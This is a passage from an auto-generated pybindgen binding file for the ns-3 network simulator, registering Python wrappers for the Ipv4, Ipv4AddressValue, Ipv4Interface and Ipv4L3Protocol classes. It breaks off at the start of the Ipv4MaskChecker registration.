    ## ipv4.h (module 'internet'): void ns3::Ipv4::DeleteRawSocket(ns3::Ptr<ns3::Socket> socket) [member function]
    cls.add_method('DeleteRawSocket',
                   'void',
                   [param('ns3::Ptr< ns3::Socket >', 'socket')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4::GetAddress(uint32_t interface, uint32_t addressIndex) const [member function]
    cls.add_method('GetAddress',
                   'ns3::Ipv4InterfaceAddress',
                   [param('uint32_t', 'interface'), param('uint32_t', 'addressIndex')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForAddress(ns3::Ipv4Address address) const [member function]
    cls.add_method('GetInterfaceForAddress',
                   'int32_t',
                   [param('ns3::Ipv4Address', 'address')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForDevice(ns3::Ptr<const ns3::NetDevice> device) const [member function]
    cls.add_method('GetInterfaceForDevice',
                   'int32_t',
                   [param('ns3::Ptr< ns3::NetDevice const >', 'device')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForPrefix(ns3::Ipv4Address address, ns3::Ipv4Mask mask) const [member function]
    cls.add_method('GetInterfaceForPrefix',
                   'int32_t',
                   [param('ns3::Ipv4Address', 'address'), param('ns3::Ipv4Mask', 'mask')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4.h (module 'internet'): uint16_t ns3::Ipv4::GetMetric(uint32_t interface) const [member function]
    cls.add_method('GetMetric',
                   'uint16_t',
                   [param('uint32_t', 'interface')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4.h (module 'internet'): uint16_t ns3::Ipv4::GetMtu(uint32_t interface) const [member function]
    cls.add_method('GetMtu',
                   'uint16_t',
                   [param('uint32_t', 'interface')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::GetNAddresses(uint32_t interface) const [member function]
    cls.add_method('GetNAddresses',
                   'uint32_t',
                   [param('uint32_t', 'interface')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::GetNInterfaces() const [member function]
    cls.add_method('GetNInterfaces',
                   'uint32_t',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv4::GetNetDevice(uint32_t interface) [member function]
    cls.add_method('GetNetDevice',
                   'ns3::Ptr< ns3::NetDevice >',
                   [param('uint32_t', 'interface')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): ns3::Ptr<ns3::IpL4Protocol> ns3::Ipv4::GetProtocol(int protocolNumber) const [member function]
    cls.add_method('GetProtocol',
                   'ns3::Ptr< ns3::IpL4Protocol >',
                   [param('int', 'protocolNumber')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4::GetRoutingProtocol() const [member function]
    cls.add_method('GetRoutingProtocol',
                   'ns3::Ptr< ns3::Ipv4RoutingProtocol >',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4.h (module 'internet'): static ns3::TypeId ns3::Ipv4::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## ipv4.h (module 'internet'): void ns3::Ipv4::Insert(ns3::Ptr<ns3::IpL4Protocol> protocol) [member function]
    cls.add_method('Insert',
                   'void',
                   [param('ns3::Ptr< ns3::IpL4Protocol >', 'protocol')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): bool ns3::Ipv4::IsDestinationAddress(ns3::Ipv4Address address, uint32_t iif) const [member function]
    cls.add_method('IsDestinationAddress',
                   'bool',
                   [param('ns3::Ipv4Address', 'address'), param('uint32_t', 'iif')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4.h (module 'internet'): bool ns3::Ipv4::IsForwarding(uint32_t interface) const [member function]
    cls.add_method('IsForwarding',
                   'bool',
                   [param('uint32_t', 'interface')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4.h (module 'internet'): bool ns3::Ipv4::IsUp(uint32_t interface) const [member function]
    cls.add_method('IsUp',
                   'bool',
                   [param('uint32_t', 'interface')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4.h (module 'internet'): bool ns3::Ipv4::RemoveAddress(uint32_t interface, uint32_t addressIndex) [member function]
    cls.add_method('RemoveAddress',
                   'bool',
                   [param('uint32_t', 'interface'), param('uint32_t', 'addressIndex')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): bool ns3::Ipv4::RemoveAddress(uint32_t interface, ns3::Ipv4Address address) [member function]
    cls.add_method('RemoveAddress',
                   'bool',
                   [param('uint32_t', 'interface'), param('ns3::Ipv4Address', 'address')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4::SelectSourceAddress(ns3::Ptr<const ns3::NetDevice> device, ns3::Ipv4Address dst, ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e scope) [member function]
    cls.add_method('SelectSourceAddress',
                   'ns3::Ipv4Address',
                   [param('ns3::Ptr< ns3::NetDevice const >', 'device'), param('ns3::Ipv4Address', 'dst'), param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): void ns3::Ipv4::Send(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Address source, ns3::Ipv4Address destination, uint8_t protocol, ns3::Ptr<ns3::Ipv4Route> route) [member function]
    cls.add_method('Send',
                   'void',
                   [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Address', 'source'), param('ns3::Ipv4Address', 'destination'), param('uint8_t', 'protocol'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): void ns3::Ipv4::SendWithHeader(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Header ipHeader, ns3::Ptr<ns3::Ipv4Route> route) [member function]
    cls.add_method('SendWithHeader',
                   'void',
                   [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Header', 'ipHeader'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): void ns3::Ipv4::SetDown(uint32_t interface) [member function]
    cls.add_method('SetDown',
                   'void',
                   [param('uint32_t', 'interface')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): void ns3::Ipv4::SetForwarding(uint32_t interface, bool val) [member function]
    cls.add_method('SetForwarding',
                   'void',
                   [param('uint32_t', 'interface'), param('bool', 'val')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): void ns3::Ipv4::SetMetric(uint32_t interface, uint16_t metric) [member function]
    cls.add_method('SetMetric',
                   'void',
                   [param('uint32_t', 'interface'), param('uint16_t', 'metric')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): void ns3::Ipv4::SetRoutingProtocol(ns3::Ptr<ns3::Ipv4RoutingProtocol> routingProtocol) [member function]
    cls.add_method('SetRoutingProtocol',
                   'void',
                   [param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): void ns3::Ipv4::SetUp(uint32_t interface) [member function]
    cls.add_method('SetUp',
                   'void',
                   [param('uint32_t', 'interface')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): ns3::Ipv4::IF_ANY [variable]
    cls.add_static_attribute('IF_ANY', 'uint32_t const', is_const=True)
    ## ipv4.h (module 'internet'): bool ns3::Ipv4::GetIpForward() const [member function]
    cls.add_method('GetIpForward',
                   'bool',
                   [],
                   is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
    ## ipv4.h (module 'internet'): bool ns3::Ipv4::GetWeakEsModel() const [member function]
    cls.add_method('GetWeakEsModel',
                   'bool',
                   [],
                   is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
    ## ipv4.h (module 'internet'): void ns3::Ipv4::SetIpForward(bool forward) [member function]
    cls.add_method('SetIpForward',
                   'void',
                   [param('bool', 'forward')],
                   is_pure_virtual=True, visibility='private', is_virtual=True)
    ## ipv4.h (module 'internet'): void ns3::Ipv4::SetWeakEsModel(bool model) [member function]
    cls.add_method('SetWeakEsModel',
                   'void',
                   [param('bool', 'model')],
                   is_pure_virtual=True, visibility='private', is_virtual=True)
    return
def register_Ns3Ipv4AddressChecker_methods(root_module, cls):
    """Register the constructor wrappers for ns3::Ipv4AddressChecker.

    Binds the default and copy constructors declared in ipv4-address.h
    (module 'network') onto *cls*, in that order.
    """
    # Default constructor: ns3::Ipv4AddressChecker::Ipv4AddressChecker()
    cls.add_constructor([])
    # Copy constructor: ns3::Ipv4AddressChecker::Ipv4AddressChecker(ns3::Ipv4AddressChecker const &)
    copy_arg = param('ns3::Ipv4AddressChecker const &', 'arg0')
    cls.add_constructor([copy_arg])
    return
def register_Ns3Ipv4AddressValue_methods(root_module, cls):
    """Register Python wrappers for ns3::Ipv4AddressValue (auto-generated).

    Adds, in declaration order, the constructors and member-function bindings
    from ipv4-address.h (module 'network') to *cls*.  Copy, Serialize and
    Deserialize are virtual overrides of the AttributeValue interface.

    root_module -- top-level pybindgen module being populated
    cls         -- pybindgen class wrapper for ns3::Ipv4AddressValue
    """
    ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue() [constructor]
    cls.add_constructor([])
    ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4AddressValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv4AddressValue const &', 'arg0')])
    ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4Address const & value) [constructor]
    cls.add_constructor([param('ns3::Ipv4Address const &', 'value')])
    ## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4AddressValue::Copy() const [member function]
    cls.add_method('Copy',
                   'ns3::Ptr< ns3::AttributeValue >',
                   [],
                   is_const=True, is_virtual=True)
    ## ipv4-address.h (module 'network'): bool ns3::Ipv4AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString',
                   'bool',
                   [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_virtual=True)
    ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4AddressValue::Get() const [member function]
    cls.add_method('Get',
                   'ns3::Ipv4Address',
                   [],
                   is_const=True)
    ## ipv4-address.h (module 'network'): std::string ns3::Ipv4AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString',
                   'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_const=True, is_virtual=True)
    ## ipv4-address.h (module 'network'): void ns3::Ipv4AddressValue::Set(ns3::Ipv4Address const & value) [member function]
    cls.add_method('Set',
                   'void',
                   [param('ns3::Ipv4Address const &', 'value')])
    return
def register_Ns3Ipv4Interface_methods(root_module, cls):
    """Register Python wrappers for ns3::Ipv4Interface (auto-generated).

    Adds, in declaration order, the constructors and member-function bindings
    from ipv4-interface.h (module 'internet') to *cls*.  DoDispose is a
    protected virtual override of the Object lifecycle hook.

    root_module -- top-level pybindgen module being populated
    cls         -- pybindgen class wrapper for ns3::Ipv4Interface
    """
    ## ipv4-interface.h (module 'internet'): ns3::Ipv4Interface::Ipv4Interface(ns3::Ipv4Interface const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv4Interface const &', 'arg0')])
    ## ipv4-interface.h (module 'internet'): ns3::Ipv4Interface::Ipv4Interface() [constructor]
    cls.add_constructor([])
    ## ipv4-interface.h (module 'internet'): bool ns3::Ipv4Interface::AddAddress(ns3::Ipv4InterfaceAddress address) [member function]
    cls.add_method('AddAddress',
                   'bool',
                   [param('ns3::Ipv4InterfaceAddress', 'address')])
    ## ipv4-interface.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4Interface::GetAddress(uint32_t index) const [member function]
    cls.add_method('GetAddress',
                   'ns3::Ipv4InterfaceAddress',
                   [param('uint32_t', 'index')],
                   is_const=True)
    ## ipv4-interface.h (module 'internet'): ns3::Ptr<ns3::ArpCache> ns3::Ipv4Interface::GetArpCache() const [member function]
    cls.add_method('GetArpCache',
                   'ns3::Ptr< ns3::ArpCache >',
                   [],
                   is_const=True)
    ## ipv4-interface.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv4Interface::GetDevice() const [member function]
    cls.add_method('GetDevice',
                   'ns3::Ptr< ns3::NetDevice >',
                   [],
                   is_const=True)
    ## ipv4-interface.h (module 'internet'): uint16_t ns3::Ipv4Interface::GetMetric() const [member function]
    cls.add_method('GetMetric',
                   'uint16_t',
                   [],
                   is_const=True)
    ## ipv4-interface.h (module 'internet'): uint32_t ns3::Ipv4Interface::GetNAddresses() const [member function]
    cls.add_method('GetNAddresses',
                   'uint32_t',
                   [],
                   is_const=True)
    ## ipv4-interface.h (module 'internet'): static ns3::TypeId ns3::Ipv4Interface::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## ipv4-interface.h (module 'internet'): bool ns3::Ipv4Interface::IsDown() const [member function]
    cls.add_method('IsDown',
                   'bool',
                   [],
                   is_const=True)
    ## ipv4-interface.h (module 'internet'): bool ns3::Ipv4Interface::IsForwarding() const [member function]
    cls.add_method('IsForwarding',
                   'bool',
                   [],
                   is_const=True)
    ## ipv4-interface.h (module 'internet'): bool ns3::Ipv4Interface::IsUp() const [member function]
    cls.add_method('IsUp',
                   'bool',
                   [],
                   is_const=True)
    ## ipv4-interface.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4Interface::RemoveAddress(uint32_t index) [member function]
    cls.add_method('RemoveAddress',
                   'ns3::Ipv4InterfaceAddress',
                   [param('uint32_t', 'index')])
    ## ipv4-interface.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4Interface::RemoveAddress(ns3::Ipv4Address address) [member function]
    cls.add_method('RemoveAddress',
                   'ns3::Ipv4InterfaceAddress',
                   [param('ns3::Ipv4Address', 'address')])
    ## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::Send(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Address dest) [member function]
    cls.add_method('Send',
                   'void',
                   [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Address', 'dest')])
    ## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetArpCache(ns3::Ptr<ns3::ArpCache> arg0) [member function]
    cls.add_method('SetArpCache',
                   'void',
                   [param('ns3::Ptr< ns3::ArpCache >', 'arg0')])
    ## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetDevice(ns3::Ptr<ns3::NetDevice> device) [member function]
    cls.add_method('SetDevice',
                   'void',
                   [param('ns3::Ptr< ns3::NetDevice >', 'device')])
    ## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetDown() [member function]
    cls.add_method('SetDown',
                   'void',
                   [])
    ## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetForwarding(bool val) [member function]
    cls.add_method('SetForwarding',
                   'void',
                   [param('bool', 'val')])
    ## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetMetric(uint16_t metric) [member function]
    cls.add_method('SetMetric',
                   'void',
                   [param('uint16_t', 'metric')])
    ## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetNode(ns3::Ptr<ns3::Node> node) [member function]
    cls.add_method('SetNode',
                   'void',
                   [param('ns3::Ptr< ns3::Node >', 'node')])
    ## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::SetUp() [member function]
    cls.add_method('SetUp',
                   'void',
                   [])
    ## ipv4-interface.h (module 'internet'): void ns3::Ipv4Interface::DoDispose() [member function]
    cls.add_method('DoDispose',
                   'void',
                   [],
                   visibility='protected', is_virtual=True)
    return
def register_Ns3Ipv4L3Protocol_methods(root_module, cls):
    """Register Python wrappers for ns3::Ipv4L3Protocol (auto-generated).

    Adds, in declaration order, the constructor, member-function bindings and
    the PROT_NUMBER static attribute from ipv4-l3-protocol.h (module
    'internet') to *cls*.  Ipv4L3Protocol is the concrete implementation of
    the abstract ns3::Ipv4 interface, so most methods here are virtual
    overrides of the bindings registered in register_Ns3Ipv4_methods.

    root_module -- top-level pybindgen module being populated
    cls         -- pybindgen class wrapper for ns3::Ipv4L3Protocol
    """
    ## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol::Ipv4L3Protocol() [constructor]
    cls.add_constructor([])
    ## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::AddAddress(uint32_t i, ns3::Ipv4InterfaceAddress address) [member function]
    cls.add_method('AddAddress',
                   'bool',
                   [param('uint32_t', 'i'), param('ns3::Ipv4InterfaceAddress', 'address')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): uint32_t ns3::Ipv4L3Protocol::AddInterface(ns3::Ptr<ns3::NetDevice> device) [member function]
    cls.add_method('AddInterface',
                   'uint32_t',
                   [param('ns3::Ptr< ns3::NetDevice >', 'device')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::Socket> ns3::Ipv4L3Protocol::CreateRawSocket() [member function]
    cls.add_method('CreateRawSocket',
                   'ns3::Ptr< ns3::Socket >',
                   [],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::DeleteRawSocket(ns3::Ptr<ns3::Socket> socket) [member function]
    cls.add_method('DeleteRawSocket',
                   'void',
                   [param('ns3::Ptr< ns3::Socket >', 'socket')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4L3Protocol::GetAddress(uint32_t interfaceIndex, uint32_t addressIndex) const [member function]
    cls.add_method('GetAddress',
                   'ns3::Ipv4InterfaceAddress',
                   [param('uint32_t', 'interfaceIndex'), param('uint32_t', 'addressIndex')],
                   is_const=True, is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::Ipv4Interface> ns3::Ipv4L3Protocol::GetInterface(uint32_t i) const [member function]
    cls.add_method('GetInterface',
                   'ns3::Ptr< ns3::Ipv4Interface >',
                   [param('uint32_t', 'i')],
                   is_const=True)
    ## ipv4-l3-protocol.h (module 'internet'): int32_t ns3::Ipv4L3Protocol::GetInterfaceForAddress(ns3::Ipv4Address addr) const [member function]
    cls.add_method('GetInterfaceForAddress',
                   'int32_t',
                   [param('ns3::Ipv4Address', 'addr')],
                   is_const=True, is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): int32_t ns3::Ipv4L3Protocol::GetInterfaceForDevice(ns3::Ptr<const ns3::NetDevice> device) const [member function]
    cls.add_method('GetInterfaceForDevice',
                   'int32_t',
                   [param('ns3::Ptr< ns3::NetDevice const >', 'device')],
                   is_const=True, is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): int32_t ns3::Ipv4L3Protocol::GetInterfaceForPrefix(ns3::Ipv4Address addr, ns3::Ipv4Mask mask) const [member function]
    cls.add_method('GetInterfaceForPrefix',
                   'int32_t',
                   [param('ns3::Ipv4Address', 'addr'), param('ns3::Ipv4Mask', 'mask')],
                   is_const=True, is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): uint16_t ns3::Ipv4L3Protocol::GetMetric(uint32_t i) const [member function]
    cls.add_method('GetMetric',
                   'uint16_t',
                   [param('uint32_t', 'i')],
                   is_const=True, is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): uint16_t ns3::Ipv4L3Protocol::GetMtu(uint32_t i) const [member function]
    cls.add_method('GetMtu',
                   'uint16_t',
                   [param('uint32_t', 'i')],
                   is_const=True, is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): uint32_t ns3::Ipv4L3Protocol::GetNAddresses(uint32_t interface) const [member function]
    cls.add_method('GetNAddresses',
                   'uint32_t',
                   [param('uint32_t', 'interface')],
                   is_const=True, is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): uint32_t ns3::Ipv4L3Protocol::GetNInterfaces() const [member function]
    cls.add_method('GetNInterfaces',
                   'uint32_t',
                   [],
                   is_const=True, is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv4L3Protocol::GetNetDevice(uint32_t i) [member function]
    cls.add_method('GetNetDevice',
                   'ns3::Ptr< ns3::NetDevice >',
                   [param('uint32_t', 'i')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::IpL4Protocol> ns3::Ipv4L3Protocol::GetProtocol(int protocolNumber) const [member function]
    cls.add_method('GetProtocol',
                   'ns3::Ptr< ns3::IpL4Protocol >',
                   [param('int', 'protocolNumber')],
                   is_const=True, is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4L3Protocol::GetRoutingProtocol() const [member function]
    cls.add_method('GetRoutingProtocol',
                   'ns3::Ptr< ns3::Ipv4RoutingProtocol >',
                   [],
                   is_const=True, is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): static ns3::TypeId ns3::Ipv4L3Protocol::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::Insert(ns3::Ptr<ns3::IpL4Protocol> protocol) [member function]
    cls.add_method('Insert',
                   'void',
                   [param('ns3::Ptr< ns3::IpL4Protocol >', 'protocol')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::IsDestinationAddress(ns3::Ipv4Address address, uint32_t iif) const [member function]
    cls.add_method('IsDestinationAddress',
                   'bool',
                   [param('ns3::Ipv4Address', 'address'), param('uint32_t', 'iif')],
                   is_const=True, is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::IsForwarding(uint32_t i) const [member function]
    cls.add_method('IsForwarding',
                   'bool',
                   [param('uint32_t', 'i')],
                   is_const=True, is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::IsUp(uint32_t i) const [member function]
    cls.add_method('IsUp',
                   'bool',
                   [param('uint32_t', 'i')],
                   is_const=True, is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::Receive(ns3::Ptr<ns3::NetDevice> device, ns3::Ptr<ns3::Packet const> p, uint16_t protocol, ns3::Address const & from, ns3::Address const & to, ns3::NetDevice::PacketType packetType) [member function]
    cls.add_method('Receive',
                   'void',
                   [param('ns3::Ptr< ns3::NetDevice >', 'device'), param('ns3::Ptr< ns3::Packet const >', 'p'), param('uint16_t', 'protocol'), param('ns3::Address const &', 'from'), param('ns3::Address const &', 'to'), param('ns3::NetDevice::PacketType', 'packetType')])
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::Remove(ns3::Ptr<ns3::IpL4Protocol> protocol) [member function]
    cls.add_method('Remove',
                   'void',
                   [param('ns3::Ptr< ns3::IpL4Protocol >', 'protocol')])
    ## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::RemoveAddress(uint32_t interfaceIndex, uint32_t addressIndex) [member function]
    cls.add_method('RemoveAddress',
                   'bool',
                   [param('uint32_t', 'interfaceIndex'), param('uint32_t', 'addressIndex')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::RemoveAddress(uint32_t interface, ns3::Ipv4Address address) [member function]
    cls.add_method('RemoveAddress',
                   'bool',
                   [param('uint32_t', 'interface'), param('ns3::Ipv4Address', 'address')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4L3Protocol::SelectSourceAddress(ns3::Ptr<const ns3::NetDevice> device, ns3::Ipv4Address dst, ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e scope) [member function]
    cls.add_method('SelectSourceAddress',
                   'ns3::Ipv4Address',
                   [param('ns3::Ptr< ns3::NetDevice const >', 'device'), param('ns3::Ipv4Address', 'dst'), param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::Send(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Address source, ns3::Ipv4Address destination, uint8_t protocol, ns3::Ptr<ns3::Ipv4Route> route) [member function]
    cls.add_method('Send',
                   'void',
                   [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Address', 'source'), param('ns3::Ipv4Address', 'destination'), param('uint8_t', 'protocol'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SendWithHeader(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Header ipHeader, ns3::Ptr<ns3::Ipv4Route> route) [member function]
    cls.add_method('SendWithHeader',
                   'void',
                   [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Header', 'ipHeader'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetDefaultTtl(uint8_t ttl) [member function]
    cls.add_method('SetDefaultTtl',
                   'void',
                   [param('uint8_t', 'ttl')])
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetDown(uint32_t i) [member function]
    cls.add_method('SetDown',
                   'void',
                   [param('uint32_t', 'i')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetForwarding(uint32_t i, bool val) [member function]
    cls.add_method('SetForwarding',
                   'void',
                   [param('uint32_t', 'i'), param('bool', 'val')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetMetric(uint32_t i, uint16_t metric) [member function]
    cls.add_method('SetMetric',
                   'void',
                   [param('uint32_t', 'i'), param('uint16_t', 'metric')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetNode(ns3::Ptr<ns3::Node> node) [member function]
    cls.add_method('SetNode',
                   'void',
                   [param('ns3::Ptr< ns3::Node >', 'node')])
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetRoutingProtocol(ns3::Ptr<ns3::Ipv4RoutingProtocol> routingProtocol) [member function]
    cls.add_method('SetRoutingProtocol',
                   'void',
                   [param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetUp(uint32_t i) [member function]
    cls.add_method('SetUp',
                   'void',
                   [param('uint32_t', 'i')],
                   is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol::PROT_NUMBER [variable]
    cls.add_static_attribute('PROT_NUMBER', 'uint16_t const', is_const=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::DoDispose() [member function]
    cls.add_method('DoDispose',
                   'void',
                   [],
                   visibility='protected', is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::NotifyNewAggregate() [member function]
    cls.add_method('NotifyNewAggregate',
                   'void',
                   [],
                   visibility='protected', is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::GetIpForward() const [member function]
    cls.add_method('GetIpForward',
                   'bool',
                   [],
                   is_const=True, visibility='private', is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::GetWeakEsModel() const [member function]
    cls.add_method('GetWeakEsModel',
                   'bool',
                   [],
                   is_const=True, visibility='private', is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetIpForward(bool forward) [member function]
    cls.add_method('SetIpForward',
                   'void',
                   [param('bool', 'forward')],
                   visibility='private', is_virtual=True)
    ## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetWeakEsModel(bool model) [member function]
    cls.add_method('SetWeakEsModel',
                   'void',
                   [param('bool', 'model')],
                   visibility='private', is_virtual=True)
    return
def register_Ns3Ipv4MaskChecker_methods(root_module, cls):
    """Register bindings for ns3::Ipv4MaskChecker (ipv4-address.h, module 'network').

    Only the default and copy constructors are exposed; registration order
    matches the generator's output (default first, then copy).
    """
